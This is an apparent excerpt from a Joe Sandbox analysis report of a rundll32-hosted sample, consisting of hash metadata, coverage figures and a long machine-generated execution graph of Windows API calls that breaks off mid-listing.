                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 2582817389-0
                                                                              • Opcode ID: 60c6101a45e3e662f086040dd3c8da8e70787ba73fd1a26f546de919f12d8c66
                                                                              • Instruction ID: c9bf0c65d33b2db9538ee38f05d0424bacbcbdad8b3b471cad7cf9065a2b3172
                                                                              • Opcode Fuzzy Hash: 60c6101a45e3e662f086040dd3c8da8e70787ba73fd1a26f546de919f12d8c66
                                                                              • Instruction Fuzzy Hash: 74F065523442616ABF64B6FA9CC08BB369DCF181A57412921FB05D61B5D628FC4643B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:13.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0.9%
                                                                              Total number of Nodes:1821
                                                                              Total number of Limit Nodes:29
                                                                              execution_graph 11747 483b963 11748 483b970 11747->11748 11753 483baa4 11747->11753 11760 463b08c 11748->11760 11755 483b9c9 11779 46e4b64 11755->11779 11757 483b9e4 11758 463b08c 16 API calls 11757->11758 11759 483ba02 11758->11759 11761 463b0a2 11760->11761 11764 463b0bf 11760->11764 11763 463b0c1 11761->11763 11761->11764 11786 463b104 11761->11786 11763->11764 11799 463eb60 11763->11799 11766 466cff0 11764->11766 11767 466cff8 11766->11767 11768 466d016 11767->11768 11867 465a894 11767->11867 11772 463b34c 11768->11772 11770 466d011 11871 4639410 11770->11871 11773 463b4db 11772->11773 11777 463b371 11772->11777 11773->11755 11777->11773 11778 463b34c 26 API calls 11777->11778 12031 463a1e8 11777->12031 12041 463b6b8 11777->12041 12051 463eb8c 11777->12051 11778->11777 11780 46e4b8b 11779->11780 11781 463c0c0 26 API calls 11780->11781 11784 46e4be9 11781->11784 11782 46e4c42 11782->11757 11784->11782 12154 46e3bec 11784->12154 12157 46e4a90 11784->12157 11787 463b10d 11786->11787 11795 463b13a 11786->11795 11788 463b12a 11787->11788 11789 463b16c 11787->11789 11787->11795 11793 463b1af 11788->11793 11788->11795 11798 463b132 11788->11798 11790 463b173 11789->11790 11791 463b17d 11789->11791 11803 4639ddc 11790->11803 11806 4639e54 11791->11806 11793->11795 11796 463b104 16 API calls 11793->11796 11795->11761 11796->11793 11797 463b08c 16 API calls 11797->11798 11798->11795 11798->11797 11800 463eb85 11799->11800 11801 463eb6b 11799->11801 11800->11763 11810 463eb2c 11801->11810 11804 4639de2 SysFreeString 11803->11804 11805 4639df0 11803->11805 11804->11805 11805->11795 11807 4639e5a 11806->11807 11808 4639e60 SysFreeString 11807->11808 11809 4639e72 11807->11809 11808->11807 11809->11795 11811 463eb30 11810->11811 11812 463eb3d 11810->11812 11814 463e80c 11811->11814 11812->11800 11815 463e8b8 11814->11815 11816 463e82c 11814->11816 11815->11812 11821 463e474 11816->11821 11818 463e854 11825 463e4dc 11818->11825 11822 463e487 11821->11822 11823 463e47d 11821->11823 11822->11818 11829 46389ac 11823->11829 11826 463e4e5 11825->11826 11827 463e4ec 11825->11827 11860 4638b44 11826->11860 11827->11812 11832 46389ba 11829->11832 11831 4638a08 11831->11822 11832->11831 11833 46389e3 GetTickCount 11832->11833 11834 4638a55 GetTickCount 11832->11834 11835 4638a8c GetTickCount 11832->11835 11836 46389fb GetTickCount 11832->11836 11838 4638a2a GetCurrentThreadId 11832->11838 11844 4638e38 GetCurrentThreadId 11832->11844 11849 4638668 11832->11849 11833->11832 11834->11831 11834->11832 11856 4638ba4 11835->11856 11836->11831 11836->11832 11838->11831 11840 4638ab6 GetTickCount 11841 4638a9c 11840->11841 11841->11835 11841->11840 11842 4638b20 11841->11842 11842->11831 11843 4638b26 GetCurrentThreadId 11842->11843 11843->11831 11845 4638e45 11844->11845 11846 4638e4c 11844->11846 11845->11832 11847 4638e73 11846->11847 11848 4638e60 GetCurrentThreadId 11846->11848 11847->11832 11848->11847 11850 4638673 11849->11850 11851 46386a2 11850->11851 11852 4638699 Sleep 11850->11852 11853 46386c1 11850->11853 11854 46386b1 Sleep 11851->11854 11855 46386ba SwitchToThread 11851->11855 11852->11853 11853->11832 11854->11853 11855->11853 11857 4638bfd 11856->11857 11858 4638bb6 11856->11858 11857->11841 11858->11857 11859 4638be4 Sleep 11858->11859 11859->11858 11865 4638838 GetCurrentThreadId 11860->11865 11862 4638b7b 11862->11827 11863 4638b4f 11863->11862 11864 4638ba4 Sleep 11863->11864 11864->11862 11866 4638845 11865->11866 11866->11863 11868 465a89b 11867->11868 11875 463f080 11868->11875 11870 465a8b3 11870->11770 11872 4639414 11871->11872 11874 463945c 11872->11874 12013 4636f68 11872->12013 11876 463f088 11875->11876 11876->11876 11879 463f0d5 11876->11879 11880 463c4e0 11876->11880 11878 463f0c4 LoadStringW 11878->11879 11879->11870 11881 463c4ee 11880->11881 11882 463c50d 11880->11882 11881->11882 11885 463c498 11881->11885 11882->11878 11886 463c4c4 11885->11886 11887 463c4a8 GetModuleFileNameW 11885->11887 11886->11878 11889 463d70c GetModuleFileNameW 11887->11889 11890 463d75a 11889->11890 11895 463d5e8 11890->11895 11892 463d786 11893 463d798 LoadLibraryExW 11892->11893 11894 463d7a0 11892->11894 11893->11894 11894->11886 11897 463d609 11895->11897 11896 463d691 11896->11892 11897->11896 11913 463d324 11897->11913 11899 463d67e 11900 463d693 GetUserDefaultUILanguage 11899->11900 11901 463d684 11899->11901 11917 463ccd4 EnterCriticalSection 11900->11917 11902 463d450 2 API calls 11901->11902 11902->11896 11904 463d6a0 11937 463d450 11904->11937 11906 463d6ad 11907 463d6d5 11906->11907 11908 463d6bb GetSystemDefaultUILanguage 11906->11908 11907->11896 11941 463d51c 11907->11941 11909 463ccd4 17 API calls 11908->11909 11911 463d6c8 11909->11911 11912 463d450 2 API calls 11911->11912 11912->11907 11914 463d346 11913->11914 11916 463d350 11913->11916 11949 463d008 11914->11949 11916->11899 11918 463cd20 LeaveCriticalSection 11917->11918 11919 463cd00 11917->11919 11982 4639d94 11918->11982 11921 463cd11 LeaveCriticalSection 11919->11921 11927 463cdc2 11921->11927 11922 463cd31 IsValidLocale 11923 463cd40 11922->11923 11924 463cd8f EnterCriticalSection 11922->11924 11925 463cd54 11923->11925 11926 463cd49 11923->11926 11928 463cda7 11924->11928 11997 463c9bc 11925->11997 11984 463cbb8 GetThreadUILanguage 11926->11984 11927->11904 11932 463cdb8 LeaveCriticalSection 11928->11932 11931 463cd5d GetSystemDefaultUILanguage 11931->11924 11933 463cd67 11931->11933 11932->11927 11934 463cd78 GetSystemDefaultUILanguage 11933->11934 11935 463c9bc 3 API calls 11934->11935 11936 463cd52 11935->11936 11936->11924 11939 463d46e 11937->11939 11938 463d4e9 11938->11906 11939->11938 12006 463d3e4 11939->12006 12011 4639e78 11941->12011 11944 463d56c 11945 463d3e4 2 API calls 11944->11945 11946 463d580 11945->11946 11947 463d5ae 11946->11947 11948 463d3e4 2 API calls 11946->11948 11947->11896 11948->11947 11950 463d01f 11949->11950 11951 463d033 GetModuleFileNameW 11950->11951 11952 463d048 11950->11952 11951->11952 11953 463d070 RegOpenKeyExW 11952->11953 11960 463d217 11952->11960 11954 463d131 11953->11954 11955 463d097 RegOpenKeyExW 11953->11955 11970 463ce18 GetModuleHandleW 11954->11970 11955->11954 11956 463d0b5 RegOpenKeyExW 11955->11956 11956->11954 11958 463d0d3 RegOpenKeyExW 11956->11958 11958->11954 11961 463d0f1 RegOpenKeyExW 11958->11961 11959 463d14f RegQueryValueExW 11962 463d1a0 RegQueryValueExW 11959->11962 11963 463d16d 11959->11963 11960->11916 11961->11954 11964 463d10f RegOpenKeyExW 11961->11964 11965 463d1bc 11962->11965 11969 463d19e 11962->11969 11966 463d175 RegQueryValueExW 11963->11966 11964->11954 11964->11960 11967 463d1c4 RegQueryValueExW 11965->11967 11966->11969 11967->11969 11968 463d206 RegCloseKey 11968->11916 11969->11968 11971 463ce40 GetProcAddress 11970->11971 11972 463ce51 11970->11972 11971->11972 11973 463ce67 11972->11973 11974 463cdf4 CharNextW 11972->11974 11978 463ceb3 11972->11978 11973->11959 11975 463ce9f 11974->11975 11975->11973 11976 463cdf4 CharNextW 11975->11976 11976->11978 11977 463cdf4 CharNextW 11977->11978 11978->11973 11978->11977 11979 463cf38 FindFirstFileW 11978->11979 11981 463cfa2 lstrlenW 11978->11981 11979->11973 11980 463cf54 FindClose lstrlenW 11979->11980 11980->11973 11980->11978 11981->11978 11983 4639d9a 11982->11983 11983->11922 11985 463cbd4 11984->11985 11986 463cc2d 11984->11986 12002 463cb74 GetThreadPreferredUILanguages 11985->12002 11988 463cb74 2 API calls 11986->11988 11994 463cc35 11988->11994 11990 463cc7c SetThreadPreferredUILanguages 11992 463cb74 2 API calls 11990->11992 11993 463cc92 11992->11993 11995 463ccad SetThreadPreferredUILanguages 11993->11995 11996 463ccbd 11993->11996 11994->11990 11994->11996 11995->11996 11996->11936 11998 463c9f7 11997->11998 11999 463ca60 IsValidLocale 11998->11999 12000 463caae 11998->12000 11999->12000 12001 463ca73 GetLocaleInfoW GetLocaleInfoW 11999->12001 12000->11931 12001->12000 12003 463cb95 12002->12003 12004 463cbae SetThreadPreferredUILanguages 12002->12004 12005 463cb9e GetThreadPreferredUILanguages 12003->12005 12004->11986 12005->12004 12007 463d3f9 12006->12007 12008 463d416 FindFirstFileW 12007->12008 12009 463d426 FindClose 12008->12009 12010 463d42c 12008->12010 12009->12010 12010->11939 12012 4639e7c GetUserDefaultUILanguage GetLocaleInfoW 12011->12012 12012->11944 12016 464028c 12013->12016 12015 4636f6d 12015->11874 12017 46402c1 TlsGetValue 12016->12017 12018 464029b 12016->12018 12019 46402a6 12017->12019 12020 46402cb 12017->12020 12018->12015 12024 46401c0 12019->12024 12020->12015 12022 46402ab TlsGetValue 12023 46402ba 12022->12023 12023->12015 12026 46401c6 12024->12026 12025 46401ea 12025->12022 12026->12025 12030 46401ac LocalAlloc 12026->12030 12028 46401e6 12028->12025 12029 46401f6 TlsSetValue 12028->12029 12029->12025 12030->12028 12032 463a20f 12031->12032 12033 463a1ec 12031->12033 12032->11777 12034 4639ddc 12033->12034 12037 463a1ff SysReAllocStringLen 12033->12037 12035 4639de2 SysFreeString 12034->12035 12036 4639df0 12034->12036 12035->12036 12036->11777 12037->12032 12038 4639d74 12037->12038 12039 4639d90 12038->12039 12040 4639d80 SysAllocStringLen 12038->12040 12039->11777 12040->12038 12040->12039 12042 463b6cd 12041->12042 12043 463b6ea 12041->12043 12044 463b6d2 12042->12044 12045 463b71e 12042->12045 12043->11777 12044->12043 12047 463b6e1 12044->12047 12050 463b75d 12044->12050 12045->12043 12046 463a1e8 3 API calls 12045->12046 12046->12045 12047->12043 12049 463b34c 26 API calls 12047->12049 12048 463b6b8 26 API calls 12048->12050 12049->12047 12050->12043 12050->12048 12052 463eb9e 12051->12052 12053 463eb60 14 API calls 12052->12053 12054 463ebb3 12053->12054 12057 463eaf4 12054->12057 12056 463ebca 12056->11777 12058 463eb27 12057->12058 12059 463eaff 12057->12059 12058->12056 12061 463e734 12059->12061 12062 463e750 12061->12062 12063 463e758 12061->12063 12073 463e5d0 12062->12073 12065 463e474 13 API calls 12063->12065 12066 463e780 12065->12066 12067 463e7c3 12066->12067 12084 463e53c 12066->12084 12069 463e4dc 2 API calls 12067->12069 12071 463e7e4 12069->12071 12071->12058 12074 463e685 12073->12074 12075 463e5e9 12073->12075 12074->12063 12076 463e5fa 12075->12076 12095 4638850 12075->12095 12077 46389ac 13 API calls 12076->12077 12082 463e629 12077->12082 12079 463e658 12081 4638b44 2 API calls 12079->12081 12083 463e67d 12081->12083 12082->12079 12099 463e460 12082->12099 12083->12063 12085 463e544 12084->12085 12086 463e54d 12085->12086 12108 463e00c 12085->12108 12088 463e2f0 12086->12088 12089 463e30a 12088->12089 12090 463e313 12089->12090 12092 463e32d 12089->12092 12112 463c0c0 12090->12112 12093 463c0c0 26 API calls 12092->12093 12094 463e328 12092->12094 12093->12094 12094->12067 12096 463885e 12095->12096 12097 4638859 12095->12097 12096->12076 12102 4638724 GetModuleHandleW GetProcAddress 12097->12102 12100 4638850 5 API calls 12099->12100 12101 463e468 12100->12101 12101->12082 12103 463874c GetLogicalProcessorInformation 12102->12103 12107 4638794 12102->12107 12104 463875b GetLastError 12103->12104 12103->12107 12105 4638765 12104->12105 12104->12107 12106 463876d GetLogicalProcessorInformation 12105->12106 12106->12107 12107->12096 12109 463e017 12108->12109 12110 4638850 5 API calls 12109->12110 12111 463e01e 12110->12111 12111->12086 12115 463be18 12112->12115 12114 463c0ca 12114->12094 12116 463be56 12115->12116 12120 463be3b 12115->12120 12117 463bec4 12116->12117 12119 463bf91 12116->12119 12125 463bf2b 12117->12125 12126 463bdd4 12117->12126 12119->12125 12143 463b8f8 12119->12143 12120->12114 12121 463be18 26 API calls 12121->12125 12123 463bedc 12123->12125 12136 463b7d0 12123->12136 12125->12120 12125->12121 12127 464028c 4 API calls 12126->12127 12128 463bddd 12127->12128 12129 463bdf3 12128->12129 12130 463bde5 12128->12130 12133 464028c 4 API calls 12129->12133 12131 464028c 4 API calls 12130->12131 12132 463bdea 12131->12132 12132->12123 12134 463be01 12133->12134 12135 464028c 4 API calls 12134->12135 12135->12132 12137 463b7ec 12136->12137 12138 463b830 12136->12138 12137->12138 12141 463b86a 12137->12141 12142 463b899 12137->12142 12138->12125 12139 463b7d0 26 API calls 12139->12141 12141->12138 12141->12139 12142->12138 12147 463b4f4 12142->12147 12144 463b901 12143->12144 12145 463b909 12143->12145 12146 463b6b8 26 API calls 12144->12146 12145->12125 12146->12145 12148 463b693 12147->12148 12149 463b517 12147->12149 12148->12142 12149->12148 12150 463b7d0 26 API calls 12149->12150 12151 463b4f4 26 API calls 12149->12151 12152 463eb8c 26 API calls 12149->12152 12153 463eb60 14 API calls 12149->12153 12150->12149 12151->12149 12152->12149 12153->12149 12160 46e3bf8 12154->12160 12169 46e4a9c 12157->12169 12161 46e3c1d 12160->12161 12163 465a894 46 API calls 12161->12163 12166 46e3c3a 12161->12166 12162 46e3bf4 12162->11784 12164 46e3c35 12163->12164 12165 4639410 4 API calls 12164->12165 12165->12166 12166->12162 12167 465a894 46 API calls 12166->12167 12168 4639410 4 API calls 12166->12168 12167->12166 12168->12166 12170 46e4abf 12169->12170 12171 465a894 46 API calls 12170->12171 12176 46e4adc 12170->12176 12173 46e4ad7 12171->12173 12172 46e4a98 12172->11784 12174 4639410 4 API calls 12173->12174 12174->12176 12175 465a894 46 API calls 12175->12176 12176->12172 12176->12175 12177 4639410 4 API calls 12176->12177 12177->12176 12178 483b842 12180 483b84d 12178->12180 12179 483b872 12186 483b889 12179->12186 12213 46e54f0 12179->12213 12180->12179 12206 472a6f0 12180->12206 12182 483b8a7 12184 483b8d6 12182->12184 12185 483ba0a 12182->12185 12188 463b08c 16 API calls 12184->12188 12187 463b08c 16 API calls 12185->12187 12191 463b104 16 API calls 12186->12191 12189 483ba32 12187->12189 12190 483b8fe 12188->12190 12192 466cff0 50 API calls 12189->12192 12193 466cff0 50 API calls 12190->12193 12194 483bd6b 12191->12194 12195 483ba40 12192->12195 12196 483b90c 12193->12196 12198 463b34c 26 API calls 12195->12198 12197 463b34c 26 API calls 12196->12197 12199 483b92f 12197->12199 12200 483ba63 12198->12200 12201 463b08c 16 API calls 12199->12201 12202 46e4b64 72 API calls 12200->12202 12203 483b95b 12201->12203 12204 483ba7e 12202->12204 12205 463b08c 16 API calls 12204->12205 12205->12186 12217 472b7c8 SetLastError 12206->12217 12208 472a710 12225 472a600 12208->12225 12210 472a718 12234 4654f14 12210->12234 12212 472a720 12212->12179 12214 46e54f9 12213->12214 12311 46e5534 12214->12311 12216 46e5515 12216->12182 12249 46556e0 12217->12249 12219 472b7f1 GetLastError 12220 472b821 12219->12220 12221 472b7fc 12219->12221 12220->12208 12221->12220 12255 4659220 12221->12255 12223 472b80d 12224 4639410 4 API calls 12223->12224 12224->12220 12262 472ae5c 12225->12262 12227 472a61f 12228 472a657 12227->12228 12283 472bad4 12227->12283 12228->12210 12231 465a894 46 API calls 12232 472a652 12231->12232 12233 4639410 4 API calls 12232->12233 12233->12228 12235 4654f29 12234->12235 12236 465a894 46 API calls 12235->12236 12239 4654f61 12235->12239 12237 4654f51 12236->12237 12238 4639410 4 API calls 12237->12238 12238->12239 12240 4654e34 6 API calls 12239->12240 12242 4654f81 12240->12242 12241 4654fbf 12241->12212 12242->12241 12243 4654fb7 12242->12243 12244 4654fc3 12242->12244 12308 4655804 12243->12308 12246 4654f14 57 API calls 12244->12246 12247 4654fd6 12246->12247 12247->12241 12248 4655804 CreateDirectoryW 12247->12248 12248->12241 12260 463a8a4 12249->12260 12251 4655700 GetFullPathNameW 12252 4655712 12251->12252 12253 4655721 12251->12253 12252->12219 12253->12252 12254 4655736 GetFullPathNameW 12253->12254 12254->12252 12256 4659237 FormatMessageW 12255->12256 12257 4659231 12255->12257 12258 4659259 12256->12258 12257->12256 12259 465927f LocalFree 12258->12259 12259->12223 12261 463a8aa 12260->12261 12261->12251 12287 472b430 12262->12287 12264 472ae81 12265 465a894 46 API calls 12264->12265 12267 472aea3 12264->12267 12266 472ae9e 12265->12266 12268 4639410 4 API calls 12266->12268 12269 465a894 46 API calls 12267->12269 12271 472aeca 12267->12271 12268->12267 12270 472aec5 12269->12270 12272 4639410 4 API calls 12270->12272 12273 472aeee 12271->12273 12274 465a894 46 API calls 12271->12274 12272->12271 12275 472af16 12273->12275 12293 472ac88 12273->12293 12276 472aee9 12274->12276 12275->12227 12279 4639410 4 API calls 12276->12279 12279->12273 12280 465a894 46 API calls 12281 472af11 12280->12281 12282 4639410 4 API calls 12281->12282 12282->12275 12284 472bae3 12283->12284 12286 472a63c 12283->12286 12285 472baf7 GetLogicalDrives 12284->12285 12284->12286 12285->12286 12286->12228 12286->12231 12289 472b439 12287->12289 12288 472b464 12288->12264 12289->12288 12290 465a894 46 API calls 12289->12290 12291 472b45f 12290->12291 12292 4639410 4 API calls 12291->12292 12292->12288 12296 4654e34 12293->12296 12297 463a8a4 12296->12297 12298 4654e47 GetFileAttributesW 12297->12298 12299 4654edb GetLastError 12298->12299 12300 4654e5a 12298->12300 12301 4654e62 12299->12301 12300->12301 12302 4654ea4 12300->12302 12303 4654e76 CreateFileW 12300->12303 12301->12275 12301->12280 12302->12301 12304 4654eb0 CreateFileW 12302->12304 12303->12301 12305 4654e93 CloseHandle 12303->12305 12306 4654ed7 12304->12306 12307 4654ecd CloseHandle 12304->12307 12305->12301 12306->12301 12307->12301 12309 463a8a4 12308->12309 12310 4655810 CreateDirectoryW 12309->12310 12310->12241 12312 46e554f 12311->12312 12313 46e557c 12312->12313 12314 46e55fa 12312->12314 12334 4654a18 12313->12334 12338 46549c0 12314->12338 12317 46e5604 12318 46556e0 2 API calls 12317->12318 12324 46e55f8 12317->12324 12320 46e561f GetLastError 12318->12320 12319 46e5599 12321 46556e0 2 API calls 12319->12321 12319->12324 12322 4659220 2 API calls 12320->12322 12323 46e55b8 GetLastError 12321->12323 12325 46e5638 12322->12325 12326 4659220 2 API calls 12323->12326 12324->12216 12327 465a964 72 API calls 12325->12327 12328 46e55d1 12326->12328 12329 46e565a 12327->12329 12342 465a964 12328->12342 12331 4639410 4 API calls 12329->12331 12331->12324 12332 46e55f3 12333 4639410 4 API calls 12332->12333 12333->12324 12335 4654a66 12334->12335 12336 4654a2e 12334->12336 12335->12319 12337 4654a60 CreateFileW 12336->12337 12337->12335 12339 4654a14 12338->12339 12340 46549d6 12338->12340 12339->12317 12340->12339 12341 4654a0e CreateFileW 12340->12341 12341->12339 12343 465a972 12342->12343 12344 463f080 46 API calls 12343->12344 12345 465a99c 12344->12345 12348 4655cc4 12345->12348 12347 465a9aa 12347->12332 12351 4655cec 12348->12351 12354 4655d1c 12351->12354 12353 4655ce4 12353->12347 12355 4655d25 12354->12355 12358 4655d85 12355->12358 12360 4655bd4 12355->12360 12357 4655dec 12357->12353 12358->12357 12359 4655bd4 72 API calls 12358->12359 12359->12358 12363 4656054 12360->12363 12362 4655bed 12362->12358 12364 46560ae 12363->12364 12367 46560a7 12363->12367 12364->12362 12365 46545b0 26 API calls 12365->12367 12366 4655b58 72 API calls 12366->12367 12367->12364 12367->12365 12367->12366 12368 4817d04 PeekMessageW 12369 4817d25 12368->12369 12370 4817e06 12368->12370 12371 4817d35 12369->12371 12372 4817d2b IsWindowUnicode 12369->12372 12373 4817d46 PeekMessageW 12371->12373 12374 4817d5c PeekMessageA 12371->12374 12372->12371 12375 4817d70 12373->12375 12374->12375 12375->12370 12389 4819ba0 GetCapture 12375->12389 12377 4817dab 12377->12370 12396 4817b98 12377->12396 12386 4817de9 TranslateMessage 12387 4817df6 DispatchMessageW 12386->12387 12388 4817dfe DispatchMessageA 12386->12388 12387->12370 12388->12370 12390 4819bb5 12389->12390 12394 4819bc6 12389->12394 12390->12394 12424 4761d04 12390->12424 12392 4819bd1 12393 4819bd7 GetParent 12392->12393 12392->12394 12395 4761d04 7 API calls 12392->12395 12393->12392 12393->12394 12394->12377 12395->12392 12397 4817bc3 12396->12397 12398 4817bac 12396->12398 12397->12370 12400 4817a50 12397->12400 12398->12397 12437 4819180 12398->12437 12401 4817a60 12400->12401 12402 4817a9a 12400->12402 12401->12402 12403 4817a87 TranslateMDISysAccel 12401->12403 12402->12370 12404 4817aa0 12402->12404 12403->12402 12405 4817abb 12404->12405 12406 4817b8e 12404->12406 12405->12406 12407 4817ac6 GetCapture 12405->12407 12406->12370 12419 4817a08 12406->12419 12408 4817b50 GetWindowThreadProcessId GetWindowThreadProcessId 12407->12408 12412 4817ad1 12407->12412 12408->12406 12409 4817b71 SendMessageW 12408->12409 12409->12406 12411 4817b2d 12409->12411 12411->12406 12413 4817b02 12412->12413 12414 4817aeb GetParent 12412->12414 12415 4817ae2 12412->12415 12692 4761d60 12412->12692 12413->12415 12416 4817b08 IsWindowUnicode 12413->12416 12414->12412 12415->12416 12417 4817b31 SendMessageA 12416->12417 12418 4817b12 SendMessageW 12416->12418 12417->12406 12417->12411 12418->12406 12418->12411 12420 4817a19 IsWindowUnicode 12419->12420 12421 4817a4d 12419->12421 12422 4817a25 IsDialogMessageW 12420->12422 12423 4817a3a IsDialogMessageA 12420->12423 12421->12370 12421->12386 12422->12421 12423->12421 12425 4761d0f GetWindowThreadProcessId 12424->12425 12426 4761d56 12424->12426 12425->12426 12427 4761d1a GetCurrentProcessId 12425->12427 12426->12392 12427->12426 12428 4761d24 12427->12428 12429 4761d2e GlobalFindAtomW 12428->12429 12430 4761d4f 12429->12430 12431 4761d3d GetPropW 12429->12431 12433 4761cd0 GetCurrentProcessId GetWindowThreadProcessId 12430->12433 12431->12426 12434 4761ce7 12433->12434 12435 4761cfd 12433->12435 12434->12435 12436 4761cec SendMessageW 12434->12436 12435->12426 12436->12435 12438 4819196 12437->12438 12439 48191ad 12437->12439 12445 481910c 12438->12445 12439->12397 12441 481919d 12454 4815a48 12441->12454 12446 481916c 12445->12446 12447 481911a 12445->12447 12446->12441 12447->12446 12448 4819130 IsWindowVisible 12447->12448 12448->12446 12449 481913a 12448->12449 12450 481914c 12449->12450 12451 481916e 12449->12451 12453 4819159 ShowWindow 12450->12453 12466 4818f18 12451->12466 12453->12446 12455 4815a54 UnhookWindowsHookEx 12454->12455 12456 4815a5f 12454->12456 12455->12456 12457 4815a80 SetEvent GetCurrentThreadId 12456->12457 12458 4815ac6 12456->12458 12459 4815abd CloseHandle 12457->12459 12461 4815a98 12457->12461 12463 4818f58 12458->12463 12459->12458 12460 4815aa4 MsgWaitForMultipleObjects 12460->12459 12460->12461 12461->12460 12472 4817e30 12461->12472 12464 4818f75 12463->12464 12465 4818f65 KillTimer 12463->12465 12464->12439 12465->12464 12467 4818f58 KillTimer 12466->12467 12468 4818f28 SetTimer 12467->12468 12469 4818f54 12468->12469 12470 4818f4d 12468->12470 12469->12446 12471 4819180 128 API calls 12470->12471 12471->12469 12477 4817d04 PeekMessageW 12472->12477 12475 4817e4c 12475->12460 12478 4817d25 12477->12478 12479 4817e06 12477->12479 12480 4817d35 12478->12480 12481 4817d2b IsWindowUnicode 12478->12481 12479->12475 12498 4818ad8 12479->12498 12482 4817d46 PeekMessageW 12480->12482 12483 4817d5c PeekMessageA 12480->12483 12481->12480 12484 4817d70 12482->12484 12483->12484 12484->12479 12485 4819ba0 9 API calls 12484->12485 12486 4817dab 12485->12486 12486->12479 12487 4817b98 122 API calls 12486->12487 12488 4817db8 12487->12488 12488->12479 12489 4817a50 TranslateMDISysAccel 12488->12489 12490 4817dcb 12489->12490 12490->12479 12491 4817aa0 15 API calls 12490->12491 12492 4817dd8 12491->12492 12492->12479 12493 4817a08 3 API calls 12492->12493 12494 4817de5 12493->12494 12494->12479 12495 4817de9 TranslateMessage 12494->12495 12496 4817df6 DispatchMessageW 12495->12496 12497 4817dfe DispatchMessageA 12495->12497 12496->12479 12497->12479 12518 4818a4c GetCursorPos 12498->12518 12501 4819180 126 API calls 12502 4818b21 12501->12502 12521 4818d34 12502->12521 12504 4818b43 12505 4818b91 GetCurrentThreadId 12504->12505 12507 4818b93 12504->12507 12508 4818b89 12504->12508 12509 4818c13 12505->12509 12510 4818c0c 12505->12510 12507->12505 12515 4818baf SetTimer 12507->12515 12525 48189e8 12508->12525 12513 4818c21 WaitMessage 12509->12513 12514 4818c26 12509->12514 12531 46f22d0 12510->12531 12513->12514 12514->12475 12515->12505 12516 4818bd6 12515->12516 12517 48189e8 74 API calls 12516->12517 12517->12505 12557 4763878 12518->12557 12522 4818d48 12521->12522 12524 4818d5e 12522->12524 12583 478bd7c 12522->12583 12524->12504 12529 48189f5 12525->12529 12526 4818a48 12526->12505 12528 4818a1f IsWindowVisible 12528->12529 12529->12526 12529->12528 12530 4818a30 IsWindowEnabled 12529->12530 12599 481495c 12529->12599 12530->12529 12532 46f22ed 12531->12532 12533 46f22e4 12531->12533 12602 46f299c 12532->12602 12533->12509 12536 46f232b 12538 46f232f 12536->12538 12539 46f2338 12536->12539 12537 46f299c 78 API calls 12540 46f2304 12537->12540 12613 46f22a8 WaitForSingleObject 12538->12613 12617 46f229c ResetEvent 12539->12617 12544 465a964 72 API calls 12540->12544 12543 46f2336 12618 4638c24 12543->12618 12545 46f2326 12544->12545 12546 4639410 4 API calls 12545->12546 12546->12536 12548 46f2351 12549 46389ac 13 API calls 12548->12549 12555 46f2359 12549->12555 12550 46f24c6 12550->12509 12551 46de084 72 API calls 12551->12555 12554 4638c24 5 API calls 12554->12555 12555->12509 12555->12550 12555->12551 12555->12554 12556 46389ac 13 API calls 12555->12556 12622 46ddef8 12555->12622 12626 4638b8c 12555->12626 12556->12555 12562 4763844 WindowFromPoint 12557->12562 12559 476388c 12560 47638b2 12559->12560 12567 476b330 12559->12567 12560->12501 12560->12502 12563 4763871 12562->12563 12564 4763858 12562->12564 12563->12559 12564->12563 12565 4761d04 7 API calls 12564->12565 12566 4763865 GetParent 12564->12566 12565->12564 12566->12563 12566->12564 12571 476b3af 12567->12571 12572 476b34f 12567->12572 12568 476b3e6 12568->12560 12570 46de084 72 API calls 12570->12572 12571->12568 12574 46de084 12571->12574 12572->12570 12572->12571 12573 476b330 72 API calls 12572->12573 12573->12572 12575 46de091 12574->12575 12576 46de0a0 12574->12576 12578 46ddf98 12575->12578 12576->12571 12579 463f080 46 API calls 12578->12579 12580 46ddfd6 12579->12580 12581 465a79c 72 API calls 12580->12581 12582 46ddfe5 12581->12582 12582->12582 12584 478bd82 12583->12584 12587 474b740 12584->12587 12586 478bd97 12586->12524 12588 474b746 12587->12588 12591 4718138 12588->12591 12590 474b75b 12590->12586 12592 471813e 12591->12592 12595 46f500c 12592->12595 12594 4718153 12594->12590 12596 46f5012 12595->12596 12597 46f35e8 76 API calls 12596->12597 12598 46f5027 12597->12598 12598->12594 12600 46de084 72 API calls 12599->12600 12601 481496c 12600->12601 12601->12529 12603 464028c 4 API calls 12602->12603 12604 46f29a2 12603->12604 12612 46f29f6 12604->12612 12632 46f0a98 12604->12632 12605 464028c 4 API calls 12607 46f22f2 12605->12607 12607->12536 12607->12537 12610 46f29b7 12636 4703720 12610->12636 12611 464028c 4 API calls 12611->12612 12612->12605 12614 46f22bb 12613->12614 12615 46f22c0 12613->12615 12691 46f229c ResetEvent 12614->12691 12615->12543 12617->12543 12619 4638c2c 12618->12619 12620 4638850 5 API calls 12619->12620 12621 4638c42 12619->12621 12620->12621 12621->12548 12623 46ddf03 12622->12623 12624 46ddf98 72 API calls 12623->12624 12625 46ddf17 12623->12625 12624->12625 12625->12555 12627 4638b94 12626->12627 12628 4638c24 5 API calls 12627->12628 12629 4638b9b 12628->12629 12630 4638b44 2 API calls 12629->12630 12631 4638ba0 12630->12631 12631->12555 12633 46f0a9e 12632->12633 12650 46f2604 12633->12650 12635 46f0abd 12635->12610 12667 470386c 12636->12667 12638 4703747 12639 4703784 12638->12639 12640 470379a 12638->12640 12673 466e940 12639->12673 12642 4703798 12640->12642 12645 463f080 46 API calls 12640->12645 12680 4703910 12642->12680 12646 47037ca 12645->12646 12676 465a79c 12646->12676 12648 47037d9 12649 4639410 4 API calls 12648->12649 12649->12642 12651 46f2616 12650->12651 12652 46f265e 12651->12652 12653 46f26b4 GetCurrentThread GetCurrentThreadId 12651->12653 12663 4639c54 12652->12663 12655 46f26b2 12653->12655 12655->12635 12656 46f2673 12656->12655 12657 46f267c GetLastError 12656->12657 12658 4659220 2 API calls 12657->12658 12659 46f268b 12658->12659 12660 